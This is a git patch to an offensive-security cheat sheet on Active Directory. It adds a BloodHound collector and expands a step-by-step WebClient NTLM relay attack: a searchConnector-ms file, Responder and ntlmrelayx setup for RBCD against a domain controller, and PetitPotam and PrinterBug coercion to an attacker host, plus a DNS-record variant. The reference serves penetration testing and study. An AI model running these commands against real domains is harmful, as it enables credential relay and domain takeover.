From 04842b53a8964a2a9c94398e4e57897645d9a4f7 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sat, 26 Oct 2024 16:38:15 +0200
Subject: [PATCH] WebClient + RustHoundCE

---
 docs/active-directory/ad-adds-enumerate.md   |  3 +-
 docs/active-directory/internal-mitm-relay.md | 57 +++++++++++++++++---
 2 files changed, 53 insertions(+), 7 deletions(-)

diff --git a/docs/active-directory/ad-adds-enumerate.md b/docs/active-directory/ad-adds-enumerate.md
index adbc1be..0090106 100644
--- a/docs/active-directory/ad-adds-enumerate.md
+++ b/docs/active-directory/ad-adds-enumerate.md
@@ -2,11 +2,12 @@
 
 ## Using BloodHound
 
-Use the correct collector:
+Use the appropriate data collector to gather information for **BloodHound** or **BloodHound Community Edition (CE)** across various platforms.
 
 * [BloodHoundAD/AzureHound](https://github.com/BloodHoundAD/AzureHound) for Azure Active Directory
 * [BloodHoundAD/SharpHound](https://github.com/BloodHoundAD/SharpHound) for local Active Directory (C# collector)
 * [FalconForceTeam/SOAPHound](https://github.com/FalconForceTeam/SOAPHound) for local Active Directory (C# collector using ADWS)
+* [g0h4n/RustHound-CE](https://github.com/g0h4n/RustHound-CE) for local Active Directory (Rust collector)
 * [NH-RED-TEAM/RustHound](https://github.com/NH-RED-TEAM/RustHound) for local Active Directory (Rust collector)
 * [fox-it/BloodHound.py](https://github.com/fox-it/BloodHound.py) for local Active Directory (Python collector)
 * [coffeegist/bofhound](https://github.com/coffeegist/bofhound) for local Active Directory  (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel's LDAP Sentinel)
diff --git a/docs/active-directory/internal-mitm-relay.md b/docs/active-directory/internal-mitm-relay.md
index 5bc3dad..a049894 100644
--- a/docs/active-directory/internal-mitm-relay.md
+++ b/docs/active-directory/internal-mitm-relay.md
@@ -245,18 +245,55 @@ secretsdump.py -k -no-pass target.lab.local
 
 *  WebClient service
 
+
+**Enable WebClient**:
+
+WebClient service can be enable on the machine using several techniques:
+
+* Mapping a WebDav server using `net` command : `net use ...`
+* Typing anything into the explorer address bar that isn't a local file or directory
+* Browsing to a directory or share that has a file with a `.searchConnector-ms` extension located inside.
+    ```xml
+    <?xml version="1.0" encoding="UTF-8"?>
+    <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
+        <description>Microsoft Outlook</description>
+        <isSearchOnlyItem>false</isSearchOnlyItem>
+        <includeInStartMenuScope>true</includeInStartMenuScope>
+        <templateInfo>
+            <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
+        </templateInfo>
+        <simpleLocation>
+            <url>https://example/</url>
+        </simpleLocation>
+    </searchConnectorDescription>
+    ```
+
 **Exploitation**:
 
-* Disable HTTP in Responder: `sudo vi /usr/share/responder/Responder.conf`
-* Generate a Windows machine name: `sudo responder -I eth0`, e.g: WIN-UBNW4FI3AP0
-* Prepare for RBCD against the DC: `python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support`
-* Discover WebDAV services
+* Discover machines on the network with enabled WebClient service
     ```ps1
     webclientservicescanner 'domain.local'/'user':'password'@'machine'
-    netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+    netexec smb 10.10.10.10 -d 'domain' -u 'user' -p 'password' -M webdav
     GetWebDAVStatus.exe 'machine'
     ```
-* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.0.0.4`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 
+
+* Disable HTTP in Responder
+    ```ps1
+    sudo vi /usr/share/responder/Responder.conf
+    ```
+
+* Generate a Windows machine name, e.g: "WIN-UBNW4FI3AP0"
+    ```ps1
+    sudo responder -I eth0
+    ```
+
+* Prepare for RBCD against the DC
+    ```ps1
+    python3 ntlmrelayx.py -t ldaps://dc --delegate-access -smb2support
+    ```
+
+
+* Trigger the authentication to relay to our nltmrelayx: `PetitPotam.exe WIN-UBNW4FI3AP0@80/test.txt 10.10.10.10`, the listener host must be specified with the FQDN or full netbios name like `logger.domain.local@80/test.txt`. Specifying the IP results in anonymous auth instead of System. 
   ```ps1
   # PrinterBug
   dementor.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
@@ -267,6 +304,7 @@ secretsdump.py -k -no-pass target.lab.local
   Petitpotam.py -d "DOMAIN" -u "USER" -p "PASSWORD" "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
   PetitPotam.exe "ATTACKER_NETBIOS_NAME@PORT/randomfile.txt" "TARGET_IP"
   ```
+
 * Use the created account to ask for a service ticket: 
     ```ps1
     .\Rubeus.exe hash /domain:purple.lab /user:WVLFLLKZ$ /password:'iUAL)l<i$;UzD7W'
@@ -275,6 +313,13 @@ secretsdump.py -k -no-pass target.lab.local
     # IP of PC1: 10.0.0.4
     ```
 
+An alternative for the previous exploitation method is to register a **DNS entry** for the attack machine by yourself then trigger the coercion.
+
+```ps1
+python3 /opt/krbrelayx/dnstool.py -u lab.lan\\jdoe -p 'P@ssw0rd' -r attacker.lab.lan -a add -d 192.168.1.50 192.168.1.2
+python3 /opt/PetitPotam.py -u jdoe -p 'P@ssw0rd' -d lab.lan attacker@80/test 192.168.1.3
+```
+
 
 ## Man-in-the-middle RDP connections with pyrdp-mitm